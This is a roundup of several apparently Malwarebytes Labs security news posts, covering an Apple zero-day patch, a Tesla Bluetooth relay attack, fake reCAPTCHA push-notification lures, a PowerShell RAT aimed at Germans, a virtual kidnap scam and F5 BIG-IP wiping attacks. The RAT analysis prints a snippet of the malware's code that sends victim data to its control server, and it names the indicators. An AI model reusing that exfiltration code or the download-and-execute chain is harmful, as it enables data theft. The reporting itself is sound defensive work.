IT NEWS

Update now! Apple patches zero-day vulnerability affecting Macs, Apple Watch, and Apple TV

Apple has released security updates for a zero-day vulnerability that affects multiple products, including Mac, Apple Watch, and Apple TV.

The flaw is an out-of-bounds write issue—tracked as CVE-2022-22675—in AppleAVD, a decoder that handles specific media files.

An out-of-bounds write or read flaw makes it possible to manipulate parts of the memory which are allocated to more critical functions. This could allow an attacker to write code to a part of the memory where it will be executed with permissions that the program and user should not have.

Attackers could take control of affected devices if they exploit this flaw.

CVE-2022-22675 is the same vulnerability that affected macOS Monterey 12.3.1, iOS 15.4.1, and iPad 15.4.1. The flaw for these was patched in March.

This latest batch of updates has improved bounds checking for additional Apple products running specific operating systems, particularly macOS Big Sur 11.6.6, watchOS 8.6, and tvOS 15.5. These OSs are installed in Apple Macs running Big Sur, Apple Watch Series 3 and later, and Apple TV (4K, 4K 2nd generation, and 4K HD).

Apple says it’s aware this flaw is currently being abused in the wild. It didn’t go into detail, likely to give customers time to patch up their Apple devices.

BleepingComputer has noted that attacks against CVE-2022-22675 might only be targeted in nature. However,if you’re using any or all of the above Apple products we mentioned, it is still wise to apply updates as soon as you can.

Stay safe!

The post Update now! Apple patches zero-day vulnerability affecting Macs, Apple Watch, and Apple TV appeared first on Malwarebytes Labs.

Car owners warned of another theft-enabling relay attack

Tesla owners are no strangers to seeing reports of cars being tampered with outside of their control. Back in 2021, a zero-click exploit aided a drone in taking over the car’s entertainment system. In 2016, we had a brakes and doors issue. 2020 saw people rewriting key-fob firmware via Bluetooth. Andin January this year, a teen claimed he had managed to remotely hack into 25 Tesla vehicles.

This time, we have another Bluetooth key-fob issue making waves. Although there is a Tesla specific advisory, there are also advisories for this issue generally and a type of smart lock.

Bluetooth Low Energy and keyless entry systems

The researchers who discovered this issue are clear that it isn’t “just” a problem for Tesla. It’s more of a problem related to the Bluetooth Low Energy (BLE) protocol used by the keyless entry system. Bluetooth is a short-range wireless technology which uses radio frequencies and allows you to share data. You can connect one device to another, interact with Bluetooth beacons, and much more. Bluetooth is a perfect fit for something as commonplace as keyless door entry.

As the name suggests, BLE is all about providing functionality through very low energy consumption. As BLE is only active for very short periods of time, it’s a much more efficient way to do things.

The relay attack in action

Researchers demonstrated how this compromise of the keyless system works in practice. Though light on details, Bloomberg mentions it is a relay attack. This is a fairly common method used by people in the car research realm to try and pop locks.

To help describe a relay attack, it’s common to first explain how a Man in the Middle (MitM) attack works:

In cybersecurity, a Man-in-the-Middle (MitM) attack happens when a threat actor manages to intercept and forward the traffic between two entities without either of them noticing. In addition, some MitM attacks alter the communication between parties, again without them realizing.

For relay attacks, think of two people (or one person with two devices) sliding their way into the device-based communication. Some of the diagrams I’ve seen explaining this attack can be a little confusing, but this video explanation is perfect:

As you can see, two people approach the car. One pulls the handles to trigger the car’s security system into sending out a message. “Are you the owner of this car, are your keys the correct keys for this vehicle?” The authentication challenge is beamed out into the void. The second person is standing by the house with a device.

People often leave their car keys close to the front door. As a result, the keys will be within range of the second person’s device. It takes the fob’s response and beams it back to the criminal by the car. The device in their hand relays the fob’s authentication confirmation to the car and the door unlocks. They then repeat this process a second time. This is to fool the car into thinking the keys are present, at which point they’re able to drive away.

A gear-shift in criminal perspective

Criminals are after maximum gain for minimum effort. They don’t want to attract attention from law enforcement. The sneakier they can be, the less commotion they cause, and the better it’s going to be for them in the long-term.

Think about how seamless a relay approach is to car theft. It’s quick, it’s easy, and it’s completely silent. Consider how much money a professional outfit pulling these car heists can generate. The alternative is messy break-ins, noise, rummaging for keys in a house full of screaming people and barking dogs. Not to mention a significantly increased chance of being caught. If you were a career criminal, which approach would you favour?

A problem which refuses to go away

Relay attacks on cars have been around for several years now. Stolen vehicles are the go-to example of relay attacks if you go looking for more information on the technique. Advice for avoiding relay attacks is widespread, from keeping keys away from the front door (which you should do anyway) to placing them in a signal-blocking bag.

For the Tesla specific attack, a relay device was placed “within roughly 15 yards” of the smartphone/key-fob, with the other plugged into a laptop close to the vehicle. You can see more information about the more general forms of attack here.

The article mentions that there’s no evidence of this Tesla tomfoolery having happened in the wild. Even so, relay attacks can and do take place. If your car operates a keyless system, take this latest report as a heads-up to ensure your vehicle is safe from attack no matter the make or model.

The post Car owners warned of another theft-enabling relay attack appeared first on Malwarebytes Labs.

A week in security (May 9 – 15)

Last week on Malwarebytes Labs:

Stay safe!

The post A week in security (May 9 – 15) appeared first on Malwarebytes Labs.

Fake reCAPTCHA forms dupe users via compromised WordPress sites

Researchers at Sucuri investigated a number of WordPress websites complaining about unwanted redirects and found websites that use fake CAPTCHA forms to get the visitor to accept web push notifications.

These websites are a new wave of a campaign that leverages many compromised WordPress sites.

CAPTCHA

CAPTCHA (“Completely Automated Public Turing test to tell Computers and Humans Apart”) is one of the annoyances that we have learned to take for granted when we browse the Internet. Scientists developed CAPTCHA as a method to tell humans and bots apart so as to to keep bots from accessing sites or systems where they are not welcome.

Google bought and owns reCAPTCHA, which represents a CAPTCHA system expressly developed to reduce the needed amount of user interaction. The original version asked users to decipher hard to read text or match images. Version 2 required users to decipher text or match images if the analysis of cookies and canvas rendering suggested an automatic download of the page. Since version 3, reCAPTCHA doesn’t interrupt users, running automatically when users load pages or click buttons.

The basic version of a real reCAPTCHA the threat actors used as a template to create the fake ones looks like this:

real reCAPTCHA
legitimate reCAPTCHA

The campaign

The fake CAPTCHA sites are part of a long lasting campaign responsible for injecting malicious scripts into compromised WordPress websites. This campaign leverages known vulnerabilities in WordPress themes and plugins and has impacted an enormous number of websites over the years.

The compromised websites all share a common issue. The threat actors injected malicious JavaScript within the affected website’s files and database. Attackers attempted to automatically infect any .js file with jQuery in the name, on a compromised website. They then injected obfuscated code when successful. This malicious JavaScript was appended under the current script or under the head of the page where it was fired on every page load, redirecting site visitors to the destination chosen by the threat actor.

The Malwarebytes Threat Intelligence Team tracked a rogue affiliate’s traffic which flowed through the same local[.]drakefollow[.]com subdomain that was mentioned in the Sucuri blog. The threat actor chose to promote a legitimate security product in this case, but might as well have led visitors to potentially unwanted programs (PUPs), adware, or tech support scams.

Wireshark image showing traffic flow plus site of the affiliate
Traffic flow from compromised WordPress site to rogue affilate’s site

The fake CAPTCHA

At this point in the chain of redirections, the fake reCAPTCHA websites kick in. The fake reCAPTCHA sites are the final step towards duping the visitor. The unsuspecting visitor will land on a site that tries to trick them into accepting push notifications from the landing page’s domain.

fake reCAPTCHA
fake reCAPTCHA

Visitors think they need to click “Allow” to get past the CAPTCHA screen, when in fact they are giving permission to the domain to send them push notifications.

By design, push notifications work similarly across different operating systems and web browsers. They appear outside of the browser window just above the taskbar on the right hand side. This is misleading as they may seem to originate from the operating system. Knowing the difference between a web push notification and an alert that comes from the operating system or another program installed on the device is hard, and that makes it difficult for the unsuspecting user of an affected system to know what is going on.

As we reported in the past, adware, search hijackers, and PUP families have added push notifications as one of their attack vectors. Sucuri warns that it is also one of the most common ways attackers display “tech support” scams, where users are told their computer is infected or slow and they should call a toll-free number to fix the problem.

Removal and mitigation

Knowing that these fake reCAPTCHA sites exist and being able to spot the difference with a real one is your best protection. Also, many security programs, including Malwarebytes, will block access to the campaign’s domains.

If your system shows you push notifications, you can find detailed instructions on how to disable and remove permissions for browser push notifications in our article: Browser push notifications: a feature asking to be abused.

Website owners can use Sucuri’s free remote website scanner to detect the malware.

Stay safe, everyone!

Special thanks to the Malwarebytes Threat Intelligence Team for their contribution and the screenshot

The post Fake reCAPTCHA forms dupe users via compromised WordPress sites appeared first on Malwarebytes Labs.

How COVID-19 fuelled a surge in malware

2021 saw a massive surge in detections of malware, adware, and Potentially Unwanted Programs (PUPs). It didn’t matter what the computers were used for or what operating system they ran—across business and home computers, on Windows and on Mac, detections went up, enormously.

Detections of malware on Windows business machines were 143% higher in 2021 than in 2020, and 65% higher on consumer machines.

Windows malware detection totals 2019-2021
Windows malware detection totals 2019-2021

Detections of malware, adware, and PUPs on macOS increased almost 220%.

Mac malware, adware and PUP detection totals 2019-2021
Mac malware, adware and PUP detection totals 2019-2021

The background to this extraordinary jump in detections is the coronavirus pandemic, so we call this surge in detections the “Covid bounce”.

The Covid bounce

In 2020, the recently-discovered novel coronavirus, and the restrictions put in place to slow its progress, caused trillions of dollars of lost economic activity and a mass migration of knowledge workers from offices to homes.

Almost all forms of business suffered—even illegal ones like cybercrime. Crooks were just as likely to get COVID-19 as anyone else, and the targets they preyed upon changed beyond recognition.

Many businesses wound down or folded, and those that didn’t had to upend their IT infrastructure overnight to support working from home. How people worked, where they worked, the tools they used, and the things they cared about were all in flux.

No wonder then, that in 2020, malware detections on Windows business machines fell 24%.

The effect was not spread evenly across all types of malware though. Detections of Emotet and TrickBot collapsed by 89% and 69% respectively, leading some to speculate that while these highly sophisticated forms of malware were extremely effective at permeating corporate networks they may be poorly adapted to exploit the work-from-home environment.

Meanwhile, detections of hacking tools, information stealers, and other malware that could help criminals better understand the transformation in their victims’ environments, increased considerably.

In 2021, as restrictions lifted gradually around the world, and as organisations and the criminals preying on them adapted to remote and hybrid work, detection numbers climbed precipitously.

And they didn’t simply return to the pre-Covid status quo, they soared past 2019’s numbers. In 2021, the detection numbers for business threats were 85% higher than in 2019, and consumer threat detections were 47% higher.

Cryptocurrency values soared in 2021 and, to nobody’s surprise, detections of malware that mines cryptocurrencies increased more than 300 precent.

Adware, spyware, and worms all displayed an enormous bounce back in 2021, climbing 200%, and detections of email threats showed a considerable “Covid bounce” too. But while the old guard of Emotet and TrickBot remained, they were not the presence of old as several new pretenders jostled for position.

It is impossible to say why detections bounced back so alarmingly last year, but the plain fact is that the world now is not the world of 2019. Events like the coronavirus pandemic have far-reaching effects that go far beyond the immediate, obvious and tragic health consequences, affecting all walks of life, even the security of your servers, laptops, and remote workers.

The pandemic accelerated the transition from a bricks-and-mortar to online existence, and for many businesses and services there is no going back.

After a period of adjustment and uncertainty in 2020, cybercrime seems to have emerged supremely well adapted to this new reality.

You can learn more about the Covid bounce and how it changed the outlook for cyberthreats into 2022 and beyond in the Malwarebytes 2022 Threat Review.

The post How COVID-19 fuelled a surge in malware appeared first on Malwarebytes Labs.

Why MRG-Effitas matters to SMBs

When selecting the right cybersecurity vendor to protect their operations, small- and medium-sized businesses (SMBs) can lean on several third-party research organizations that analyze which cybersecurity products can best prevent, detect, and clean up various types of cyberattacks today.

But these tests can sometimes assume a level of end-user complexity—and funding and staffing—that the average SMB might lack. Without a full-time security team, or even a single full-time internal IT hire, an SMB could unwittingly purchase a cybersecurity product that, while effective, requires a level of expertise they simply do not have.

This is where one third-party research team, in particular, can help.

MRG-Effitas, which produces quarterly reports about cybersecurity products that publicly participate in evaluations, focuses its analyses on “real world” malware attacks and detection capabilities. Not only do the researchers test malware samples that are currently infecting endpoints across the world, but the researchers also stress the importance of simple, effective notifications that will help the average user respond to any detected cyberthreat.

“Simulating normal user behaviour means that we pay special attention to all alerts given by security applications,” wrote the researchers in their most recent quarterly report for their program, the “360° Assessment & Certification.”

The 360° Assessment & Certification combines several tests that are then grouped into four separate certifications. Based on how a cybersecurity product performed in certain tests, that product will either earn a certificate or not. This almost-binary representation of a product’s performance is simple and effective, and it can help to quickly inform an SMB about whether a certain product is right for their company.

At the core of the MRG-Effitas certification process—which tests how products respond to known exploits, ransomware, botnets, adware, and more—is the user.

“A pass is given only when alerts are straightforward, and clearly suggest that the malicious action should be blocked,” the report said. “With this in mind, it is very important to note that the best choice for an average user is to keep things as simple as possible and not to overwhelm them with cryptic pop-ups, alerts or questions.”

Testing and certification

The 360° Assessment & Certification by MRG-Effitas involves the following nine rounds of testing:

  • In the Wild/Full Spectrum Test
  • PUA/Adware Test
  • Exploit/Fileless Test
  • Real Botnet Test
  • Banking Simulator Test
  • Ransomware Simulator Test
  • False Positive Ransomware Test
  • False Positive Test
  • Performance Test

Each test has a specific purpose, from testing how cybersecurity products respond to an end-user visiting a malicious URL that delivers malware, to the detection of non-malicious but meddlesome applications such as adware, to even testing how a product responds to live ransomware samples observed in real world applications, and to simulated ransomware samples developed by MRG-Effitas. Importantly, MRG-Effitas also tests the performance load of each cybersecurity product, analyzing how much time it takes to perform certain tasks on devices that have the cybersecurity product installed.

While MRG-Effitas performs testing in the above nine categories, it only awards certificates in four categories: The 360° Assessment, the 360° Exploit Degree, the 360° Online Banking Degree, and the 360° Ransomware Degree.

For the 360° Assessment, MRG-Effitas assigns two levels of certification—Level 1 and Level 2—depending on how successfully a cybersecurity product detected the cyberthreats that were launched at it during testing. A vendor only receives Level 1 certification if it detected all threats on “first exposure or via behaviour protection,” the report said, and it passed the Real Botnet Test.

The malware load used during the 360° Assessment is significant. In the most recent round, it involved 360 “In The Wild” samples that included: “20 trojans, 54 backdoors, 50 financial malware samples, 53 ransomware, 49 spyware, 84 malicious documents, [and] 50 malicious script files.”

Just four products publicly received a Level 1 certification in the recent 360° Assessment: Malwarebytes Endpoint Protection, Bitdefender Endpoint Security, Microsoft Windows Defender, and Symantec Endpoint Protection.

A similar test deploys 50 financial malware samples against the detection and protection capabilities of the cybersecurity products, along with simulated banking malware. Five products publicly received the 360° Online Banking Certification: Malwarebytes Endpoint Protection, Avira Antivirus Pro, Bitdefender Endpoint Security, ESET Endpoint Security, and Symantec Endpoint Protection.

Ransomware simulations

In just the past decade, ransomware has evolved tremendously. Developers of the infamous family of malware have gone from asking for measly sums of money from individuals to creating entire business models in which they license out their ransomware tool to other threat actors. When those threat actors successfully hit a business—which they could have purchased access to from other threat actors—the original ransomware developers take a cut of whatever eventual payment is made. To make matters worse, threat actors have also begun deploying ransomware that not only encrypts a company’s files, but it also first exfiltrates any sensitive data, which the threat actors then use as a second point of leverage: Pay up or your data will be published for everyone to see.

The researchers at MRG-Effitas, recognizing this rapid pace of ransomware evolution, have, for years, tested cybersecurity products against ransomware samples developed in-house that could represent where ransomware development is headed in just months or years.

In the most recent 360° Assessment & Certification, MRG-Effitas deployed 53 ransomware samples against the cybersecurity products, and an additional four simulated ransomware samples. To achieve the 360° Ransomware Certification, a product must have protected a device from the 53 ransomware samples and 4 simulated ransomware simulated samples, and it must have passed the false positive ransomware test.

In the most recent round of testing, all nine publicly-evaluated cybersecurity products achieved ransomware certification.

Performance

Understanding whether a cybersecurity product works well is, obviously, important. But of similar importance to SMBs is understanding what impact a cybersecurity product will have on a suite of endpoints. Without large budgets that could allow for constantly refreshed, new devices to be purchased, SMBs should consider how much a cybersecurity product could slow down their organizations’ devices.

Thankfully, MRG-Effitas analyzes cybersecurity products based on their impact on performing simple operations, like downloading a file, opening a Microsoft Office program, or opening a website. The analysis also measures the time spent performing a security software update and the CPU usage during the update process.

Unlike the certificates offered by MRG-Effitas for other categories, there is no certificate or “pass/fail” result when testing performance. Instead, SMBs can look at the performance measurements for each product in the latest 360° Assessment & Certification.

Less “interpretation,” quicker answers

The simplicity of MRG-Effitas’ 360° Assessment & Certification gives SMBs a quick guide into what cybersecurity products could be the right fit for them. Without having to dive into countless interpretive reports from each cybersecurity vendor, SMBs can instead look at the most recent 360° Assessment & Certification and ask themselves: Which of these products received certification and which did not?

Knowing that MRG-Effitas hews its testing ideology to the user—only offering certifications for products that clearly notify and warn users about how to respond to a threat—SMBs can be sure that whatever tool they choose will, at the very least, be easy to use on their end.

The post Why MRG-Effitas matters to SMBs appeared first on Malwarebytes Labs.

Custom PowerShell RAT targets Germans seeking information about the Ukraine crisis

This blog post was authored by Hossein Jazi and Jérôme Segura

Populations around the world—and in Europe in particular—are following the crisis in Ukraine very closely, and with events unfolding on a daily basis, people are hungry for information.

Although all countries have reasons to be concerned, the situation is Germany is more complicated than most. It is one of the few European countries to have received criticism for its attitude to the Ukraine-Russia conflict, as it struggles to end its reliance on Russian energy, and Moscow recently imposed sanctions on Gazprom Germania, further increasing economic tensions.

This week our analysts discovered a new campaign that plays on these concerns by trying to lure Germans with a promise of updates on the current threat situation in Ukraine. The downloaded document is in fact decoy for a Remote Access Trojan (RAT) capable of stealing data and executing other malicious commands on a victim’s computer.

Decoy site lures victims with Ukraine situation

Threat actors registered an expired German domain name at collaboration-bw[.]de that was formally used as a collaboration platform to develop new ideas for the Baden-Württemberg state.

old site
Threat actors registered an expired domain associated with Baden-Württemberg

The threat actors used the domain to host a website that looked like the official Baden-Württemberg website, baden-wuerttemberg.de.

compare
A comparison of the real baden-wuerttemberg.de (top) and the malicious fake (bottom)

With this copycat, the attackers created the perfect placeholder for the lure they wanted their victims to download: A file tantalising called 2022-Q2-Bedrohungslage-Ukraine (threat situation in Ukraine for Q2), offered via a prominent blue download button.

lure site
The website promises important information and tips about the Ukraine crisis

An English translation of the page reads:

Important, current threat situation regarding the Ukraine crisis

On this website you will always find the most important information and tips for dealing with the current threat posed by the Ukraine crisis. Please download the document now and read through the current information. The document is constantly updated and is up to date. Our suggested tips can be practically implemented in everyday work and you should already implement them today. Thanks for your support.

File analysis

The archive file called 2022-Q2-Bedrohungslage-Ukraine contains a file named 2022-Q2-Bedrohungslage-Ukraine.chm. The CHM format is Microsoft’s HTML help file format, which consists of a number of compiled HTML files.

chm
The CHM file displays a fake error message

Victims will get a fake error message when they open up that file, while PowerShell quietly runs a Base64 command.

b64
PowerShell executes a Base64-encoded command

After de-obfuscating the command we can see it is designed to execute a script downloaded from the fake Baden-Württemberg website, using Invoke-Expression (IEX).

The PowerShell code fetches and executes a malicious script
powershell
The malicious script downloaded from the fake Baden-Württemberg website

The downloaded script creates a folder called SecuriyHealthService in the current user directory and drops two files into it: MonitorHealth.cmd and a script called Status.txt. The .cmd file is very simple and just executes Status.txt through PowerShell.

Finally, the downloaded script makes MonitorHealth.cmd persistent by creating a scheduled task that will execute it each day at a specific time.

PowerShell RAT (Status.txt)

Status.txt is a RAT written in PowerShell. It starts its activities by collecting some information about the victim’s computer, such as the current username and working directory, and the computer’s hostname. It also builds a unique id for the victim, the clientid.

This data is exfiltrated as a JSON data structure sent to the server via a POST request:

$json = '{
  "type": "newclient",
  "result": "",
  "pwd": "' + $pwd_b64 + '",
  "cuser": "' + $cuser + '",
  "hostname": "' + $hname + '",
  "clientid": "' + $clientid + '"
}';

$headers = @{'X-Request-ID' = $strhash;}

However, before executing this requests the script will first bypass the Windows Antimalware Scan Interface (AMSI) using an AES-encrypted function called bypass. It is decrypted using a generated key and IV before execution.

bypass
The bypass function that contains the encrypted script to bypass AMSI.
amsi
The content of the AMSI bypass script after decryption

This RAT has the following capabilities:

  • Download (type: D0WNl04D): Download files from server
  • Upload (type: UPL04D): Upload file to the server
  • LoadPS1 (type: L04DPS1): Load and execute a PowerShell script
  • Command (type: C0MM4ND): Execute a specific command

German command and control server

The attack was thoughtfully carried out—even ensuring that the stolen data was sent to a German domain name, kleinm[.]de, to avoid suspicion.

POST

It is not easy to attribute this activity to a specific actor, and there are no solid indicators to support attribution. Based on motivation alone, we hypothesise that a Russian threat actor could be targeting German users, but without clear connections in infrastructure or similarities to known TTPs, such attribution is weak.

The Malwarebytes Threat Intelligence team continues to monitor attacks taking advantage of the war in Ukraine while ensuring our customers are protected.

Indicators of Compromise (IOCs)

Phishing site

collaboration-bw[.]de/bedrohung-ukr.html

Lure

2022-Q2-Bedrohungslage-Ukraine.zip
2430f68285120686233569e51e2147914dc87f82c7dbdf07fe0c34dbb1aca77c
2022-Q2-Bedrohungslage-Ukraine.chm
80bad7e0d5a5d2782674bb8334dcca03534aa831c37aebb5962da1cd1bec4130

Status.txt
a5d8beaa832832576ca97809be4eee9441eb6907752a7e1f9a390b29bbb9fe1f

MonitorHealth.cmd
fc71522a4125ca4bdc5e5deca4a6498e7f2da4408614c2e1284c3ae8c083a5fd

C2

kleinm[.]de

MITRE ATT&CK

Tactic ID Name Description
Execution T1059 Command and Scripting Interpreter Starts cmd.exe to run hh.exe
Executes PowerShell script to download and execute a script
Persistence T1053 Scheduled Task/Job Executes task scheduler to add MonitorHealth.cmd as a daily task
Defense evasion T1222 File and Directory Permissions Modification Uses attrib.exe to hide SecuriyHealthService folder

The post Custom PowerShell RAT targets Germans seeking information about the Ukraine crisis appeared first on Malwarebytes Labs.

How to spot the signs of a virtual kidnap scam

Threats and bluster play a key role in most online attacks: Ransomware has its ransom note; trolls threaten to ramp up the pressure; tech support scammers insist your PC needs urgent assistance.

Some take it a step further, leaning in with a more direct approach, ranging from death threats to sextortion, and even kidnap claims. These tactics have been around for a very long time. You can reach back to 2007 and look in amazement at the 419 death threat. In 2013, we had pretend hitmen threatening murder unless victims paid $25,000 to survive their non-existent wrath.

An example of the kidnapping variety is currently in the news, and it’s well worth familiarising yourself with it.

The virtual kidnap: Step by step

Kidnap scams involve making a phone call to a victim and telling them a loved one has been taken. Threats of violence soon follow, unless a ransom—typically in the form of a wire transfer—is paid. The most disturbing aspect of these calls is that scammers play recordings of screams in the background.

One horribly fascinating aspect of this crime is that panic and adrenaline can convince victims that the voice they hear is that of their son, daughter, spouse, and so on. You see this time and time again. In that kind of high-stakes, high-pressure scenario, who can blame them?

Things become even worse when social engineering combines with publicly available data to make it even more convincing.

Profiling the victim

Victims of the most recent virtual kidnap attempt likely had some of their information used against them in the call. Scammers pretended to have someone’s mother held hostage, with the threat of never seeing her again. Sadly, the ruse was made more convincing because the caller ID displayed as the recipient’s mother’s phone number. Somehow, somewhere, they were able to connect the two relatives and their cell numbers.

The already convincing impact of the scream recording would be amplified by the recognisable number. At this point, it’s already game over. The fraudster on this occasion asked for money to be sent through Venmo. We see criminals gravitating to digital payment systems, cryptocurrencies, and even gift cards across most realms of attack. Wire fraud is still big business, but digital transfers are appealing to those wanting to make a quick getaway.

On this occasion, the victim is $900 out of pocket and that’s before we consider the significant psychological impact of a supposed kidnap phone call.

Tips to avoid virtual kidnapping attempts

This is clearly an incredibly disturbing thing to have happen, and plenty of tactics to combat this crime have developed this past decade. FBI Chicago released several good pieces of advice in March, which take into account the social engineering side of things:

  • Never post news of upcoming travel dates and locations online.
  • Discuss virtual kidnapping with family members prior to any travel.
  • Have a “password” that family members can use to confirm a loved one is really in trouble.
  • Be wary of providing financial information to strangers over the phone.

Some of the other tips focus mainly on bogus wire transfers. As we see above, criminals are happy to use other methods to swipe ill-gotten gains. Not being able to describe the victim is another good tip, but how many people would risk asking this in the heat of the moment? Would you really want to upset a kidnapper and have them just hang up because you said the wrong thing?

Keeping cell phone numbers private on any website is a must. Posting photos of your vacation in real-time? Set up a private Instagram and share it with close friends and family only. Don’t leave contact details of family members stored in easily compromised email accounts. Lock them down with whatever additional methods are to hand. 2 factor authentication and password managers are good places to start.

Nobody wants a late night call claiming a loved one is being held hostage. Having said that, if the worst happens? Keep cool, take a deep breath, and work your way though the above suggestions. It’s almost certainly an astonishingly malicious piece of fakery.

The post How to spot the signs of a virtual kidnap scam appeared first on Malwarebytes Labs.

College closes down after ransomware attack

Lincoln College, one of the few rural schools in Illinois, said that it will permanently close on Friday, May 13, after 157 years, partly due to the impacts of the COVID-19 pandemic and partly due to a long recovery after a ransomware attack in December 2021. The institution notified the Illinois Department of Higher Education and Higher Learning Commission and posted a goodbye note on its website.

“Lincoln College has survived many difficult and challenging times – the economic crisis of 1887, a major campus fire in 1912, the Spanish flu of 1918, the Great Depression, World War II, the 2008 global financial crisis, and more, but this is different. Lincoln College needs help to survive.”

The institution struggled during the ongoing pandemic and a December 2021 ransomware attack only challenged it further. Lincoln said the attack “thwarted admissions activities and hindered access to all institutional data, creating an unclear picture of Fall 2022 enrollment projections”.

” All systems required for recruitment, retention, and fundraising efforts were inoperable. Fortunately, no personal identifying information was exposed. Once fully restored in March 2022, the projections displayed significant enrollment shortfalls, requiring a transformational donation or partnership to sustain Lincoln College beyond the current semester.”

The closing of a US college or university marks another first in ransomware attack history. Director of Research and Education Networks Information Sharing and Analysis Center (ISCA) Kim Milford told NBC News, which first broke the story, that a school closing only underscores the toll a ransomware attack can take on its victim. “I feel really bad for Lincoln College and wish there was some way we could help, but it can be a very expensive proposition when you’re hit by ransomware,” she said.

How to avoid ransomware attacks

  1. Require the use of multi-factor authentication (MFA). It might feel like a bother, but MFA is relatively easy to set up, and it doesn’t disrupt normal day-to-day activities.
  2. Install security software on all systems. Use one that offers multiple layers of protection against online threats, especially ransomware.
  3. Patch as soon as you can. Universities rely on various software for various tasks. Keeping it all up-to-date means cybercriminals can’t exploit existing and known flaws.
  4. Promote awareness for all faculty members and staff. Educating university employees to help them understand their part in protecting the university from cyberattacks is essential. Remember that this is every faculty, school staff, and students’ responsibility, not just the people in IT.
  5. Back up your files. When it comes to ransomware attacks, this is one of the pieces of advice we give out. But as we found out, you have to know how to back things up properly. This episode of our Lock and Code podcast is worth a listen, where Matt Crape, technical account manager of VMWare, to learn more about why backups fail us when we need them the most.

This video cannot be displayed because your Functional Cookies are currently disabled.

To enable them, please visit our privacy policy and search for the Cookies section. Select “Click Here” to open the Privacy Preference Center and select “Functional Cookies” in the menu. You can switch the tab back to “Active” or disable by moving the tab to “Inactive.” Click “Save Settings.”

If you want to read more about how to protect yourself from a ransomware attack, or how to recover if you are in the midst of one, download our Ransomware Emergency Kit.

The post College closes down after ransomware attack appeared first on Malwarebytes Labs.

F5 BIG-IP vulnerability is now being used to disable servers

As we reported a few days ago, a F5 BIG-IP vulnerability listed as CVE-2022-1388 is actively being exploited. But now researchers have noticed that attackers aren’t just taking control of the vulnerable servers but also making them unusable by destroying the device’s file system.

F5 BIG-IP

The BIG-IP platform by F5 is a family of products covering software and hardware designed around application availability, access control, and security solutions. It is used for various applications like load balancing and application delivery.

On May 4, 2022 F5 notified users of the existence of a vulnerability in BIG-IP iControl REST where undisclosed requests could bypass iControl REST authentication. F5 said the vulnerability could allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. The attacker, in other words, could gain complete control over the affected device.

Soon after the patch, two separate groups of researchers announced on Twitter that they had developed exploits and would publish them soon. Other researchers noticed online scanning was ongoing for BIG-IP.

Due to the critical nature of the bug, F5 urged admins to apply updates as soon as possible.

New type of attack

While most of the attacks so far were aimed at creating a foothold or gathering information for further attacks, we are now seeing a very different and destructive type of attacks.

At least one group of attackers is sending commands to vulnerable devices that delete the whole F5 file system, which is breaking load balancing and websites.

command
Attackers are wiping vulnerable devices’ file systems

While destroying the file system of the device may seem worse than data exfiltration or planting a backdoor at first glance, some researchers are saying it may be a blessing in disguise. The group is making the vulnerable devices unavailable for threat actors that are trying to utilize the more monetizable attack vectors. Most of the original attacks were dropping web shells, which are malicious scripts used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)

The motives of this threat actor are hard to guess. Maybe it’s simply a case of showing off, or an act out of sheer frustration.

But for those running a vulnerable device this makes the “can’t patch now, for it will make the device unavailable” argument moot. If this attackers gets to you the device will be unavailable for much longer than it takes to patch.

Stay safe, everyone!

The post F5 BIG-IP vulnerability is now being used to disable servers appeared first on Malwarebytes Labs.